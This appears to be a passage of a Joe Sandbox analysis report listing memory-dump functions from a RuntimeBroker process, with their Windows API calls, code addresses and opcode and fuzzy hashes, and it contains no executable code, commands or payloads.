                                            • Instruction ID: 44d22b55a2ff4a1befbfcb379a16c64173f3ae210f34f254b53232aa5d5416cd
                                            • Opcode Fuzzy Hash: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
                                            • Instruction Fuzzy Hash: 3F21E3B590464D9FCB10CF9AC884BEFFBF5EB48320F108029E958A7251D778A944CFA5

                                            Control-flow Graph (basic blocks and edges)
                                            • 3599: 58496c8-5849750, calls VirtualProtect -> 3602, 3603
                                            • 3602: 5849752-5849758 -> 3603
                                            • 3603: 5849759-584977a
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
                                            • Instruction ID: a93b67b09fa74e6308c9e1e6a4196e954be9941bae64ca6cc88d58455118aaf7
                                            • Opcode Fuzzy Hash: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
                                            • Instruction Fuzzy Hash: EE21F7759016499FCB10CF9AD885BDFFBF4EF48320F108429E958A7251D778AA44CFA1
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
                                            • Instruction ID: d65d5129f3e5114cddb8e9ad82794519a14810ddf0dc3bcc48070e0886ba5591
                                            • Opcode Fuzzy Hash: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
                                            • Instruction Fuzzy Hash: 0521F2B590464D9FCB20CF9AC484BDEFBF5FB48320F108029E968A7251D378A944CFA5

                                            Control-flow Graph (basic blocks and edges)
                                            • 3605: 584081c-5841aa0, calls VirtualProtect -> 3609, 3610
                                            • 3609: 5841aa2-5841aa8 -> 3610
                                            • 3610: 5841aa9-5841aca
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
                                            • Instruction ID: b4638239e995bb299d28572b2be97f4688b1e6330e772557b24b99fae2b00ad6
                                            • Opcode Fuzzy Hash: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
                                            • Instruction Fuzzy Hash: 1721F475D046499FCB10CF9AC484BDEFBF5FB48320F108429E958A7251D378A944CFA1
                                            APIs
                                            • TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProcessTerminate
                                            • String ID:
                                            • API String ID: 560597551-0
                                            • Opcode ID: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
                                            • Instruction ID: 2fd90efc0f14ed3857621a1d3b8a33c7323b0842f8290634874e05d935e03a52
                                            • Opcode Fuzzy Hash: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
                                            • Instruction Fuzzy Hash: 511126B18016499FDB20CF9AD845BDEFBF5EB48320F108429E958A7340C738A944CFA1
                                            APIs
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 05844170
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
                                            • Instruction ID: 41620051195e08cb1a50dfe0de719d1019112e1b173c16653483a5f9b00ddb60
                                            • Opcode Fuzzy Hash: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
                                            • Instruction Fuzzy Hash: 6D2124B1C046599BCB14DF9AD844B9EFBB4FB48320F10812AE919A7210D774A900CFA0
                                            APIs
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 05844170
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
                                            • Instruction ID: f402c9c82612a39047e4ea4f71982ca3f21df15879183c7fb434d66421751778
                                            • Opcode Fuzzy Hash: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
                                            • Instruction Fuzzy Hash: 9A2136B1D0565A9BCB14CFAAD844B9EFBB5FF48320F14825AD819A7210C738A944CFA1
                                            APIs
                                            • TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProcessTerminate
                                            • String ID:
                                            • API String ID: 560597551-0
                                            • Opcode ID: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
                                            • Instruction ID: b46ccd590db3eb91c2b3f114af104cac8c729f5bdc91bd111e4bde483d00c6cf
                                            • Opcode Fuzzy Hash: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
                                            • Instruction Fuzzy Hash: E91125718006498FDB10CF9AC585BDEFBF4EF89320F248429D968A7341D778A944CFA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
                                            • Instruction ID: 25a0685e124786076dd1e734dab65e7fcda93595e80f95d5b282cb2c4c7bbd46
                                            • Opcode Fuzzy Hash: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
                                            • Instruction Fuzzy Hash: 4C1100B180464CCFCB20DF9AC488B9EFBF5EB49324F20845AD919B7240D379A944CFA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
                                            • Instruction ID: 567e12b098bc1b33d69b578424b0c3c3ab80f2ff502031a7dfe97b048b18d2a7
                                            • Opcode Fuzzy Hash: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
                                            • Instruction Fuzzy Hash: D321E071504200DFDB25DF98E980B26FF65EBA8718F3481ADE90A0A256C336D456CAE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
                                            • Instruction ID: c67bb18912aca9c327b5ff02dd0fee93bd72ea6c47b241da510eab7f345d7fb1
                                            • Opcode Fuzzy Hash: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
                                            • Instruction Fuzzy Hash: DC212FB1104204DFDB25DF94D8C0F26FF62FB98B24F2085ADE9091A25AC33AD456CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction ID: ded18c13732ff9edff11d893a577ce9289dd0d782ab3dfb4636aa93e6dde4d94
                                            • Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction Fuzzy Hash: 23119D76504240DFDB16CF54D9C4B16BF62FB98724F2485ADD8090A256C336D456CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction ID: b34fe2c78b8ca8a726ea087eda055f64b95c91a8ba54a708ba18759c5bc9ec92
                                            • Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction Fuzzy Hash: 0011AF76504244CFCB16CF54D9C4B16FF62FB84714F2486ADD8490B257C336D45ACBA1

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
                                            • Instruction ID: 458444700accddc9be5287144c2e5a50c60e76f541e7473d218b1bb7418a4fcb
                                            • Opcode Fuzzy Hash: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
                                            • Instruction Fuzzy Hash: 89B19034A0462CCFDB14DB69D594B7E76B6FB88310F258429ED06D7290CB39DC828F95